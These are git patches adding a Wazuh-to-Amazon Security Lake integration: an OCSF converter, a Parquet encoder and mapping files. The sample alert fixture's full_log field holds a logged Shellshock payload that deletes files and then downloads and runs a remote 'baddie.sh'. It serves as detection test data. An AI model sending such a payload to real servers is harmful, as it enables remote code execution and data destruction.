+++ b/integrations/amazon-security-lake/ocsf/test.py
@@ -0,0 +1,15 @@
+#!/usr/bin/python
+
+from converter import convert
+import json
+
+converted_event = {}
+with open("wazuh-event.sample.json", "r") as fd:
+    sample_event = json.load(fd)
+    # print(json.dumps(sample_event, indent=4))
+    converted_event = convert(sample_event)
+    
+if converted_event:
+    with open("wazuh-event.ocsf.json", "w") as fd:
+        json.dump(converted_event, fd)
+        print("Done")
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json
new file mode 100644
index 0000000000000..3f35697a9fe36
--- /dev/null
+++ b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json
@@ -0,0 +1,90 @@
+{
+  "_index": "wazuh-alerts-4.x-2024.02.08",
+  "_id": "yBMliY0Bt8FzffO0BOIu",
+  "_version": 1,
+  "_score": null,
+  "_source": {
+    "input": {
+      "type": "log"
+    },
+    "agent": {
+      "name": "redacted.com",
+      "id": "000"
+    },
+    "manager": {
+      "name": "redacted.com"
+    },
+    "data": {
+      "protocol": "GET",
+      "srcip": "000.111.222.10",
+      "id": "404",
+      "url": "/cgi-bin/jarrewrite.sh"
+    },
+    "rule": {
+      "firedtimes": 1,
+      "mail": false,
+      "level": 6,
+      "pci_dss": [
+        "11.4"
+      ],
+      "tsc": [
+        "CC6.1",
+        "CC6.8",
+        "CC7.2",
+        "CC7.3"
+      ],
+      "description": "Shellshock attack attempt",
+      "groups": [
+        "web",
+        "accesslog",
+        "attack"
+      ],
+      "mitre": {
+        "technique": [
+          "Exploitation for Privilege Escalation",
+          "Exploit Public-Facing Application"
+        ],
+        "id": [
+          "T1068",
+          "T1190"
+        ],
+        "tactic": [
+          "Privilege Escalation",
+          "Initial Access"
+        ]
+      },
+      "id": "31166",
+      "nist_800_53": [
+        "SI.4"
+      ],
+      "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271",
+      "gdpr": [
+        "IV_35.7.d"
+      ]
+    },
+    "location": "/var/log/nginx/access.log",
+    "decoder": {
+      "name": "web-accesslog"
+    },
+    "id": "1707402914.872885",
+    "GeoLocation": {
+      "city_name": "Amsterdam",
+      "country_name": "Netherlands",
+      "region_name": "North Holland",
+      "location": {
+        "lon": 4.9087,
+        "lat": 52.3534
+      }
+    },
+    "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"",
+    "timestamp": "2024-02-08T11:35:14.334-0300"
+  },
+  "fields": {
+    "timestamp": [
+      "2024-02-08T14:35:14.334Z"
+    ]
+  },
+  "sort": [
+    1707402914334
+  ]
+}
\ No newline at end of file

From dcc119e07edfff1c99655a0755c9632662a662fb Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=81lex=20Ruiz?= <alejandro.ruiz.becerra@wazuh.com>
Date: Fri, 9 Feb 2024 17:33:34 +0100
Subject: [PATCH 13/34] Add OCSF converter + Parquet encoder + test scripts

---
 integrations/amazon-security-lake/.gitignore  |   3 +
 .../{ => logstash}/pipe-output.conf           |   0
 .../{ => logstash}/wazuh-s3.conf              |   1 +
 .../amazon-security-lake/ocsf/converter.py    | 125 +++++++++---------
 .../amazon-security-lake/parquet/parquet.py   |  20 +++
 .../amazon-security-lake/parquet/test.py      |  11 ++
 .../amazon-security-lake/requirements.txt     |   2 +
 7 files changed, 102 insertions(+), 60 deletions(-)
 create mode 100644 integrations/amazon-security-lake/.gitignore
 rename integrations/amazon-security-lake/{ => logstash}/pipe-output.conf (100%)
 rename integrations/amazon-security-lake/{ => logstash}/wazuh-s3.conf (97%)
 create mode 100644 integrations/amazon-security-lake/parquet/parquet.py
 create mode 100644 integrations/amazon-security-lake/parquet/test.py
 create mode 100644 integrations/amazon-security-lake/requirements.txt

diff --git a/integrations/amazon-security-lake/.gitignore b/integrations/amazon-security-lake/.gitignore
new file mode 100644
index 0000000000000..56bf77e1b8d6f
--- /dev/null
+++ b/integrations/amazon-security-lake/.gitignore
@@ -0,0 +1,3 @@
+.venv/
+wazuh-event.ocsf.json
+*.parquet
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/pipe-output.conf b/integrations/amazon-security-lake/logstash/pipe-output.conf
similarity index 100%
rename from integrations/amazon-security-lake/pipe-output.conf
rename to integrations/amazon-security-lake/logstash/pipe-output.conf
diff --git a/integrations/amazon-security-lake/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/wazuh-s3.conf
similarity index 97%
rename from integrations/amazon-security-lake/wazuh-s3.conf
rename to integrations/amazon-security-lake/logstash/wazuh-s3.conf
index 108423afd3193..6ca2ca0d5a08f 100644
--- a/integrations/amazon-security-lake/wazuh-s3.conf
+++ b/integrations/amazon-security-lake/logstash/wazuh-s3.conf
@@ -15,6 +15,7 @@ input {
                }
             }
       }'
+      target => "_source"
       schedule => "* * * * *"
    }
 }
diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py
index a9168aead1e1a..fba84e7304dc7 100644
--- a/integrations/amazon-security-lake/ocsf/converter.py
+++ b/integrations/amazon-security-lake/ocsf/converter.py
@@ -3,6 +3,7 @@
 # event comes from Filebeat
 event = {}
 
+
 def normalize(level: int) -> int:
     """
     Normalizes rule level into the 0-6 range, required by OCSF.
@@ -10,73 +11,77 @@ def normalize(level: int) -> int:
     # TODO normalization
     return level
 
+
+def join(iterable, separator=","):
+    return (separator.join(iterable))
+
+
 def convert(event: dict) -> dict:
     """
     Converts Wazuh events to OCSF's Detecting Finding (2004) class.
     """
     ocsf_class_template = \
-    {
-        "activity_id": 1,
-        "category_name": "Findings",
-        "category_uid": 2,
-        "class_name": "Detection Finding",
-        "class_uid": 2004,
-        "count": event["_source"]["rule"]["firedtimes"],
-        "message": event["_source"]["rule"]["description"],
-        "finding_info": {
-            "analytic": {
-                "category": event["_source"]["rule"]["groups"], # Err: rule.groups is a string array, but analytic.category is a string
-                "name": event["_source"]["decoder"]["name"],
-                "type": "Rule", # analytic.type is redundant together with type_id
-                "type_id": 1,
-                "uid": event["_source"]["rule"]["id"], 
-            },
-            "attacks": {
-                "tactic": event["_source"]["rule"]["mitre"]["tactic"], # Err: rule.mitre.tactic is a string array, but attacks.tactic is an object
-                "technique": event["_source"]["rule"]["mitre"]["technique"], # Err: rule.mitre.technique is a string array, but attacks.technique is an object
-                "version": "v13.1"
-            },
-            "title": event["_source"]["rule"]["description"],
-            "types": [
-                event["_source"]["input"]["type"]
-            ],
-            "uid": event["_source"]['id']
-        },
-        "metadata": {
-            "log_name": "Security events",
-            "log_provider": "Wazuh",
-            "product": {
-                "name": "Wazuh",
-                # Skipped. 
-                # OCSF description of this field is: The version of the product, as
-                # defined by the event source. For example: 2013.1.3-beta. We do not
-                # save such info as part of the event data.
-                # "version": "4.9.0", 
-                "lang": "en",
-                "vendor_name": "Wazuh, Inc,."
+        {
+            "activity_id": 1,
+            "category_name": "Findings",
+            "category_uid": 2,
+            "class_name": "Detection Finding",
+            "class_uid": 2004,
+            "count": event["_source"]["rule"]["firedtimes"],
+            "message": event["_source"]["rule"]["description"],
+            "finding_info": {
+                "analytic": {
+                    "category": join(event["_source"]["rule"]["groups"]),
+                    "name": event["_source"]["decoder"]["name"],
+                    "type_id": 1,
+                    "uid": event["_source"]["rule"]["id"],
+                },
+                "attacks": {
+                    "tactic": {
+                        "name": join(event["_source"]["rule"]["mitre"]["tactic"]),
+                    },
+                    "technique": {
+                        "name": join(event["_source"]["rule"]["mitre"]["technique"]),
+                        "uid": join(event["_source"]["rule"]["mitre"]["id"]),
+                    },
+                    "version": "v13.1"
+                },
+                "title": event["_source"]["rule"]["description"],
+                "types": [
+                    event["_source"]["input"]["type"]
+                ],
+                "uid": event["_source"]['id']
             },
-            "version": "1.1.0",
-        },
-        "raw_data": event["_source"]["full_log"],
-        "resources": [
-            {
-                "name": event["_source"]["agent"]["name"],
-                "uid": event["_source"]["agent"]["id"]
+            "metadata": {
+                "log_name": "Security events",
+                "log_provider": "Wazuh",
+                "product": {
+                    "name": "Wazuh",
+                    "lang": "en",
+                    "vendor_name": "Wazuh, Inc,."
+                },
+                "version": "1.1.0",
             },
-        ],
-        "risk_score": event["_source"]["rule"]["level"],
-        "severity_id": normalize(event["_source"]["rule"]["level"]),
-        "status_id": 99,
-        "time": event["_source"]["timestamp"],
-        "type_uid": 200401,
-        "unmapped": {
-            "data_sources": [
-                event["_index"],
-                event["_source"]["location"],
-                event["_source"]["manager"]["name"]
+            "raw_data": event["_source"]["full_log"],
+            "resources": [
+                {
+                    "name": event["_source"]["agent"]["name"],
+                    "uid": event["_source"]["agent"]["id"]
+                },
             ],
-            "nist": event["_source"]["rule"]["nist_800_53"], # Array
+            "risk_score": event["_source"]["rule"]["level"],
+            "severity_id": normalize(event["_source"]["rule"]["level"]),
+            "status_id": 99,
+            "time": event["_source"]["timestamp"],
+            "type_uid": 200401,
+            "unmapped": {
+                "data_sources": [
+                    event["_index"],
+                    event["_source"]["location"],
+                    event["_source"]["manager"]["name"]
+                ],
+                "nist": event["_source"]["rule"]["nist_800_53"],  # Array
+            }
         }
-    }
 
-    return ocsf_class_template
\ No newline at end of file
+    return ocsf_class_template
diff --git a/integrations/amazon-security-lake/parquet/parquet.py b/integrations/amazon-security-lake/parquet/parquet.py
new file mode 100644
index 0000000000000..79a146f0993a2
--- /dev/null
+++ b/integrations/amazon-security-lake/parquet/parquet.py
@@ -0,0 +1,20 @@
+
+import pyarrow as pa
+import pyarrow.parquet as pq
+import pyarrow.fs as pafs
+
+
+class Parquet:
+
+    @staticmethod
+    def encode(data: dict):
+        return pa.Table.from_pydict(data)
+
+    @staticmethod
+    def to_s3(data: pa.Table, s3: pafs.S3FileSystem):
+        pass
+
+    @staticmethod
+    def to_file(data: pa.Table, path: str):
+        # pq.write_to_dataset(table=data, root_path=path)
+        pq.write_table(data, path)
diff --git a/integrations/amazon-security-lake/parquet/test.py b/integrations/amazon-security-lake/parquet/test.py
new file mode 100644
index 0000000000000..2022111b25e33
--- /dev/null
+++ b/integrations/amazon-security-lake/parquet/test.py
@@ -0,0 +1,11 @@
+#!/usr/bin/python
+
+import pyarrow as pa
+from parquet import Parquet
+import json
+
+# converted_event = {}
+with open("wazuh-event.ocsf.json", "r") as fd:
+    events = [json.load(fd)]
+    table = pa.Table.from_pylist(events)
+    Parquet.to_file(table, "output/wazuh-event.ocsf.parquet")
diff --git a/integrations/amazon-security-lake/requirements.txt b/integrations/amazon-security-lake/requirements.txt
new file mode 100644
index 0000000000000..8c7a1cbaae79b
--- /dev/null
+++ b/integrations/amazon-security-lake/requirements.txt
@@ -0,0 +1,2 @@
+pyarrow>=10.0.1
+parquet-tools>=0.2.15
\ No newline at end of file

From 5c5ff2460219e16dae716f2b4cb3e4b4e493b391 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=81lex=20Ruiz?= <alejandro.ruiz.becerra@wazuh.com>
Date: Fri, 9 Feb 2024 17:33:43 +0100
Subject: [PATCH 14/34] Update .gitignore

---
 integrations/amazon-security-lake/.gitignore | 180 ++++++++++++++++++-
 1 file changed, 178 insertions(+), 2 deletions(-)

diff --git a/integrations/amazon-security-lake/.gitignore b/integrations/amazon-security-lake/.gitignore
index 56bf77e1b8d6f..0740f723d0c79 100644
--- a/integrations/amazon-security-lake/.gitignore
+++ b/integrations/amazon-security-lake/.gitignore
@@ -1,3 +1,179 @@
-.venv/
 wazuh-event.ocsf.json
-*.parquet
\ No newline at end of file
+*.parquet
+
+# Created by https://www.toptal.com/developers/gitignore/api/python
+# Edit at https://www.toptal.com/developers/gitignore?templates=python
+
+### Python ###
+# Byte-compiled / optimized / DLL files
+__pycache__/
+*.py[cod]
+*$py.class
+
+# C extensions
+*.so
+
+# Distribution / packaging
+.Python
+build/
+develop-eggs/
+dist/
+downloads/
+eggs/
+.eggs/
+lib/
+lib64/
+parts/
+sdist/
+var/
+wheels/
+share/python-wheels/
+*.egg-info/
+.installed.cfg
+*.egg
+MANIFEST
+
+# PyInstaller
+#  Usually these files are written by a python script from a template
+#  before PyInstaller builds the exe, so as to inject date/other infos into it.
+*.manifest
+*.spec
+
+# Installer logs
+pip-log.txt
+pip-delete-this-directory.txt
+
+# Unit test / coverage reports
+htmlcov/
+.tox/
+.nox/
+.coverage
+.coverage.*
+.cache
+nosetests.xml
+coverage.xml
+*.cover
+*.py,cover
+.hypothesis/
+.pytest_cache/
+cover/
+
+# Translations
+*.mo
+*.pot
+
+# Django stuff:
+*.log
+local_settings.py
+db.sqlite3
+db.sqlite3-journal
+
+# Flask stuff:
+instance/
+.webassets-cache
+
+# Scrapy stuff:
+.scrapy
+
+# Sphinx documentation
+docs/_build/
+
+# PyBuilder
+.pybuilder/
+target/
+
+# Jupyter Notebook
+.ipynb_checkpoints
+
+# IPython
+profile_default/
+ipython_config.py
+
+# pyenv
+#   For a library or package, you might want to ignore these files since the code is
+#   intended to run in multiple environments; otherwise, check them in:
+# .python-version
+
+# pipenv
+#   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
+#   However, in case of collaboration, if having platform-specific dependencies or dependencies
+#   having no cross-platform support, pipenv may install dependencies that don't work, or not
+#   install all needed dependencies.
+#Pipfile.lock
+
+# poetry
+#   Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control.
+#   This is especially recommended for binary packages to ensure reproducibility, and is more
+#   commonly ignored for libraries.
+#   https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control
+#poetry.lock
+
+# pdm
+#   Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control.
+#pdm.lock
+#   pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it
+#   in version control.
+#   https://pdm.fming.dev/#use-with-ide
+.pdm.toml
+
+# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm
+__pypackages__/
+
+# Celery stuff
+celerybeat-schedule
+celerybeat.pid
+
+# SageMath parsed files
+*.sage.py
+
+# Environments
+.env
+.venv
+env/
+venv/
+ENV/
+env.bak/
+venv.bak/
+
+# Spyder project settings
+.spyderproject
+.spyproject
+
+# Rope project settings
+.ropeproject
+
+# mkdocs documentation
+/site
+
+# mypy
+.mypy_cache/
+.dmypy.json
+dmypy.json
+
+# Pyre type checker
+.pyre/
+
+# pytype static type analyzer
+.pytype/
+
+# Cython debug symbols
+cython_debug/
+
+# PyCharm
+#  JetBrains specific template is maintained in a separate JetBrains.gitignore that can
+#  be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore
+#  and can be added to the global gitignore or merged into this file.  For a more nuclear
+#  option (not recommended) you can uncomment the following to ignore the entire idea folder.
+#.idea/
+
+### Python Patch ###
+# Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration
+poetry.toml
+
+# ruff
+.ruff_cache/
+
+# LSP config files
+pyrightconfig.json
+
+# End of https://www.toptal.com/developers/gitignore/api/python
\ No newline at end of file

From a39ef909d11c4941551e63956b4ef7822c745a29 Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Thu, 8 Feb 2024 08:19:39 -0300
Subject: [PATCH 15/34] Include the contents of the alert under unmapped

---
 integrations/stdin_to_securitylake.py | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py
index 3a6145747783a..09fba3ad554d4 100755
--- a/integrations/stdin_to_securitylake.py
+++ b/integrations/stdin_to_securitylake.py
@@ -26,6 +26,9 @@ def map_to_ocsf(alert_dictionary, mappings, ocsf_output):
       for field in depth_levels[1:]:
         current_level = current_level[field]
     ocsf_output[key] = current_level
+  ### We probably need to crop the fields we already
+  ### mapped to OCSF from ocsf_output
+  ocsf_output['unmapped'] = alert_dictionary
 
 def encode_parquet(list,bucket_name,folder):
   ### We can write directly to S3 from pyarrow:

From 97725bcd97667aff3664055447814bf277b6b89d Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Thu, 8 Feb 2024 11:44:40 -0300
Subject: [PATCH 16/34] Add support for different OCSF schema versions

---
 integrations/ocsf-mapping.json        | 116 ++++++++++++++++++--------
 integrations/stdin_to_securitylake.py |  13 +--
 2 files changed, 87 insertions(+), 42 deletions(-)

diff --git a/integrations/ocsf-mapping.json b/integrations/ocsf-mapping.json
index b2cf6d3b8d3f7..c1238dac285df 100644
--- a/integrations/ocsf-mapping.json
+++ b/integrations/ocsf-mapping.json
@@ -1,42 +1,86 @@
 {	
-	"constants":
+	"1.0.0":
 	{
-		"activity_id" : 1,
-		"analytic.type" : "Rule",
-		"analytic.type_id" : 1,
-		"attacks.version" : "v13.1",
-		"category_name" : "Findings",
-		"category_uid" : 2,
-		"class_name" : "Security Finding",
-		"class_uid" : 2001,
-		"metadata.log_name" : "Security events",
-		"metadata.log_provider" : "Wazuh",
-		"metadata.product.lang" : "en",
-		"metadata.product.name" : "Wazuh",
-		"metadata.product.vendor_name" : "Wazuh, Inc.",
-		"metadata.product.version" : "4.9.0",
-		"state_id" : 99,
-		"type_uid" : 200101
+		"constants":
+		{
+			"activity_id" : 1,
+			"analytic.type" : "Rule",
+			"analytic.type_id" : 1,
+			"attacks.version" : "v13.1",
+			"category_name" : "Findings",
+			"category_uid" : 2,
+			"class_name" : "Security Finding",
+			"class_uid" : 2001,
+			"metadata.log_name" : "Security events",
+			"metadata.log_provider" : "Wazuh",
+			"metadata.product.lang" : "en",
+			"metadata.product.name" : "Wazuh",
+			"metadata.product.vendor_name" : "Wazuh, Inc.",
+			"metadata.product.version" : "4.9.0",
+			"status_id" : 99,
+			"type_uid" : 200101
+		},
+		"mappings":
+		{
+			"analytic.category" : "rule.groups",
+			"analytic.name" : "decoder.name",
+			"analytic.uid" : "rule.id",
+			"attacks.tactics" : "rule.mitre.tactic",
+			"attacks.technique" : "rule.mitre.technique",
+			"count" : "rule.firedtimes",
+			"data_sources" : ["_index", "location", "manager.name"], 
+			"finding.title" : "rule.description",
+			"finding.types" : "input.type",
+			"finding.uid" : "id",
+			"message" : "rule.description",
+			"nist" : "rule.nist_800_53",
+			"raw_data" : "full_log",
+			"resources.name" : "agent.name",
+			"resources.uid" : "agent.id",
+			"risk_score" : "rule.level",
+			"severity_id" : "rule.level",
+			"time" : "timestamp"
+		}
 	},
-	"mappings":
+	"1.1.0":
 	{
-		"analytic.category" : "rule.groups",
-		"analytic.name" : "decoder.name",
-		"analytic.uid" : "rule.id",
-		"attacks.tactics" : "rule.mitre.tactic",
-		"attacks.technique" : "rule.mitre.technique",
-		"count" : "rule.firedtimes",
-		"data_sources" : ["_index", "location", "manager.name"], 
-		"finding.title" : "rule.description",
-		"finding.type" : "input.type",
-		"finding.uid" : "id",
-		"message" : "rule.description",
-		"nist" : "rule.nist_800_53",
-		"raw_data" : "full_log",
-		"resources.name" : "agent.name",
-		"resources.uid" : "agent.id",
-		"risk_score" : "rule.level",
-		"severity_id" : "rule.level",
-		"time" : "timestamp"
+		"constants":
+		{
+			"activity_id" : 1,
+			"category_name" : "Findings",
+			"category_uid" : 2,
+			"class_name" : "Security Finding",
+			"class_uid" : 2001,
+			"finding_info.analytic.type" : "Rule",
+			"finding_info.analytic.type_id" : 1,
+			"finding_info.attacks.version" : "v13.1",
+			"metadata.log_name" : "Security events",
+			"metadata.log_provider" : "Wazuh",
+			"metadata.product.lang" : "en",
+			"metadata.product.name" : "Wazuh",
+			"metadata.product.vendor_name" : "Wazuh, Inc.",
+			"metadata.product.version" : "4.9.0",
+			"status_id" : 99,
+			"type_uid" : 200101
+		},
+		"mappings":
+		{
+			"count" : "rule.firedtimes",
+			"finding_info.analytic.category" : "rule.groups",
+			"finding_info.analytic.name" : "decoder.name",
+			"finding_info.analytic.uid" : "rule.id",
+			"finding_info.attacks.tactic" : "rule.mitre.tactic",
+			"finding_info.attacks.technique" : "rule.mitre.technique",
+			"finding_info.title" : "rule.description",
+			"finding_info.types" : "input.type",
+			"finding_info.uid" : "id",
+			"message" : "rule.description",
+			"raw_data" : "full_log",
+			"resources.name" : "agent.name",
+			"resources.uid" : "agent.id",
+			"risk_score" : "rule.level",
+			"severity_id" : "rule.level",
+			"time" : "timestamp"
+		}
 	}
 }
diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py
index 09fba3ad554d4..5efb9da83bb80 100755
--- a/integrations/stdin_to_securitylake.py
+++ b/integrations/stdin_to_securitylake.py
@@ -13,13 +13,13 @@
 
 s3 = fs.S3FileSystem()
 
-def map_to_ocsf(alert_dictionary, mappings, ocsf_output):
+def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema):
   ocsf_output = {}
   ### Put constants into the output alert
-  ocsf_output |= mappings['constants']
+  ocsf_output |= mappings[ocsfschema]['constants']
 
-  for key in mappings['mappings']:
-    dotted_destination_field = mappings['mappings'].get(key)
+  for key in mappings[ocsfschema]['mappings']:
+    dotted_destination_field = mappings[ocsfschema]['mappings'].get(key)
     depth_levels = dotted_destination.split('.')
     current_level = alert_dictionary[depth_levels[0]]
     if len(depth_levels>1):
@@ -51,7 +51,7 @@ def map_block(fileobject, length, mappings):
     alert = json.loads(line)
     ocsf_mapped_alert = {}
     map_to_ocsf(alert, mappings, ocsf_mapped_alert):
-    output.append(ocsf_mapped_alert)
+   output.append(ocsf_mapped_alert)
   return output
 
 def get_elapsedseconds(reference_timestamp):
@@ -66,6 +66,7 @@ def parse_arguments():
   parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake')
   parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length')
   parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval')
+  parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use')
   parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)')
   debugging = parser.add_argument_group('debugging')
   debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to')
@@ -95,7 +96,7 @@ def parse_arguments():
           ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas
           ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory
 
-          current_block = map_block(stdin, args.linebuffer, mappings)
+          current_block = map_block(stdin, args.linebuffer, mappings,args.ocsfschema)
           if current_block[-1] == block_ending :
             output_buffer +=  current_block[0:current_block.index(block_ending)]
             time.sleep(args.sleeptime)

From e313572485453506a8dda93711e0168bbcd2dec5 Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Thu, 15 Feb 2024 12:19:31 -0300
Subject: [PATCH 17/34] Use custom ocsf module to map alerts

---
 .../stdin_to_securitylake.py                  | 38 ++++++++++---------
 1 file changed, 20 insertions(+), 18 deletions(-)
 rename integrations/{ => amazon-security-lake}/stdin_to_securitylake.py (84%)

diff --git a/integrations/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py
similarity index 84%
rename from integrations/stdin_to_securitylake.py
rename to integrations/amazon-security-lake/stdin_to_securitylake.py
index 5efb9da83bb80..21374d85ee0ad 100755
--- a/integrations/stdin_to_securitylake.py
+++ b/integrations/amazon-security-lake/stdin_to_securitylake.py
@@ -9,26 +9,28 @@
 from datetime import datetime
 from pyarrow import parquet, Table, fs
 
+import ocsf
+
 block_ending = { "block_ending": True }
 
 s3 = fs.S3FileSystem()
 
-def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema):
-  ocsf_output = {}
-  ### Put constants into the output alert
-  ocsf_output |= mappings[ocsfschema]['constants']
-
-  for key in mappings[ocsfschema]['mappings']:
-    dotted_destination_field = mappings[ocsfschema]['mappings'].get(key)
-    depth_levels = dotted_destination.split('.')
-    current_level = alert_dictionary[depth_levels[0]]
-    if len(depth_levels>1):
-      for field in depth_levels[1:]:
-        current_level = current_level[field]
-    ocsf_output[key] = current_level
-  ### We probably need to crop the fields we already
-  ### mapped to OCSF from ocsf_output
-  ocsf_output['unmapped'] = alert_dictionary
+#def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema):
+#  ocsf_output = {}
+#  ### Put constants into the output alert
+#  ocsf_output |= mappings[ocsfschema]['constants']
+#
+#  for key in mappings[ocsfschema]['mappings']:
+#    dotted_destination_field = mappings[ocsfschema]['mappings'].get(key)
+#    depth_levels = dotted_destination.split('.')
+#    current_level = alert_dictionary[depth_levels[0]]
+#    if len(depth_levels>1):
+#      for field in depth_levels[1:]:
+#        current_level = current_level[field]
+#    ocsf_output[key] = current_level
+#  ### We probably need to crop the fields we already
+#  ### mapped to OCSF from ocsf_output
+#  ocsf_output['unmapped'] = alert_dictionary
 
 def encode_parquet(list,bucket_name,folder):
   ### We can write directly to S3 from pyarrow:
@@ -49,8 +51,8 @@ def map_block(fileobject, length, mappings):
       output.append(block_ending)
       break 
     alert = json.loads(line)
-    ocsf_mapped_alert = {}
-    map_to_ocsf(alert, mappings, ocsf_mapped_alert):
+    ocsf_mapped_alert = ocsf.convert(alert)
+    #map_to_ocsf(alert, mappings, ocsf_mapped_alert):
    output.append(ocsf_mapped_alert)
   return output
 

From 4896d159912cdfc627e52eba2ebac3f5790d541e Mon Sep 17 00:00:00 2001
From: Fede Tux <federico.galland@wazuh.com>
Date: Thu, 15 Feb 2024 12:53:40 -0300
Subject: [PATCH 18/34] Modify script to use converter class

---
 .../amazon-security-lake/ocsf/converter.py    | 40 ++++++++---------
 .../stdin_to_securitylake.py                  | 45 +++++++++----------
 2 files changed, 42 insertions(+), 43 deletions(-)

diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py
index fba84e7304dc7..2a14b75957c97 100644
--- a/integrations/amazon-security-lake/ocsf/converter.py
+++ b/integrations/amazon-security-lake/ocsf/converter.py
@@ -27,30 +27,30 @@ def convert(event: dict) -> dict:
             "category_uid": 2,
             "class_name": "Detection Finding",
             "class_uid": 2004,
-            "count": event["_source"]["rule"]["firedtimes"],
-            "message": event["_source"]["rule"]["description"],
+            "count": event["rule"]["firedtimes"],
+            "message": event["rule"]["description"],
             "finding_info": {
                 "analytic": {
-                    "category": join(event["_source"]["rule"]["groups"]),
-                    "name": event["_source"]["decoder"]["name"],
+                    "category": join(event["rule"]["groups"]),
+                    "name": event["decoder"]["name"],
                     "type_id": 1,
-                    "uid": event["_source"]["rule"]["id"],
+                    "uid": event["rule"]["id"],
                 },
                 "attacks": {
                     "tactic": {
-                        "name": join(event["_source"]["rule"]["mitre"]["tactic"]),
+                        "name": join(event["rule"]["mitre"]["tactic"]),
                     },
                     "technique": {
-                        "name": join(event["_source"]["rule"]["mitre"]["technique"]),
-                        "uid": join(event["_source"]["rule"]["mitre"]["id"]),
+                        "name": join(event["rule"]["mitre"]["technique"]),
+                        "uid": join(event["rule"]["mitre"]["id"]),
                     },
                     "version": "v13.1"
                 },
-                "title": event["_source"]["rule"]["description"],
+                "title": event["rule"]["description"],
                 "types": [
-                    event["_source"]["input"]["type"]
+                    event["input"]["type"]
                 ],
-                "uid": event["_source"]['id']
+                "uid": event['id']
             },
             "metadata": {
                 "log_name": "Security events",
@@ -62,25 +62,25 @@ def convert(event: dict) -> dict:
                 },
                 "version": "1.1.0",
             },
-            "raw_data": event["_source"]["full_log"],
+            "raw_data": event["full_log"],
             "resources": [
                 {
-                    "name": event["_source"]["agent"]["name"],
-                    "uid": event["_source"]["agent"]["id"]
+                    "name": event["agent"]["name"],
+                    "uid": event["agent"]["id"]
                 },
             ],
-            "risk_score": event["_source"]["rule"]["level"],
-            "severity_id": normalize(event["_source"]["rule"]["level"]),
+            "risk_score": event["rule"]["level"],
+            "severity_id": normalize(event["rule"]["level"]),
             "status_id": 99,
-            "time": event["_source"]["timestamp"],
+            "time": event["timestamp"],
             "type_uid": 200401,
             "unmapped": {
                 "data_sources": [
                     event["_index"],
-                    event["_source"]["location"],
-                    event["_source"]["manager"]["name"]
+                    event["location"],
+                    event["manager"]["name"]
                 ],
-                "nist": event["_source"]["rule"]["nist_800_53"],  # Array
+                "nist": event["rule"]["nist_800_53"],  # Array
             }
         }
 
diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py
index 21374d85ee0ad..49926a8aa1d64 100755
--- a/integrations/amazon-security-lake/stdin_to_securitylake.py
+++ b/integrations/amazon-security-lake/stdin_to_securitylake.py
@@ -6,10 +6,10 @@
 import logging
 import time
 import json
-from datetime import datetime
+import datetime
 from pyarrow import parquet, Table, fs
 
-import ocsf
+from ocsf import converter
 
 block_ending = { "block_ending": True }
 
@@ -43,7 +43,7 @@ def encode_parquet(list,bucket_name,folder):
   table = Table.from_pylist(list)
   parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder))
 
-def map_block(fileobject, length, mappings):
+def map_block(fileobject, length):
   output=[]
   for line in range(0, length):
     line = fileobject.readline()
@@ -51,44 +51,41 @@ def map_block(fileobject, length, mappings):
       output.append(block_ending)
       break 
     alert = json.loads(line)
-    ocsf_mapped_alert = ocsf.convert(alert)
+    ocsf_mapped_alert = converter.convert(alert)
     #map_to_ocsf(alert, mappings, ocsf_mapped_alert):
-   output.append(ocsf_mapped_alert)
+  output.append(ocsf_mapped_alert)
   return output
 
 def get_elapsedseconds(reference_timestamp):
